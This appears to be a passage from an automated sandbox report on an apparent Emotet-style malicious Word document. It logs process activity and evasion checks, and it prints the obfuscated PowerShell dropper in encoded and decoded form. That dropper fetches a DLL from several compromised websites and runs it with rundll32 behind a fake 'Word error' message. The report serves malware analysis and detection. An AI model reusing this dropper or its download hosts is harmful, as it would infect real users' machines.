                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2556Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023109C FindFirstFileW,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: rundll32.exe, 00000007.00000002.2101005953.00000000006BD000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: rundll32.exe, 00000008.00000002.2102889346.000000000071C000.00000004.00000001.sdmpBinary or memory string: PPTP00VMware_S
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 5.2.136.90 80
                    Encrypted powershell cmdline option foundShow sources
                    Source: unknownProcess created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0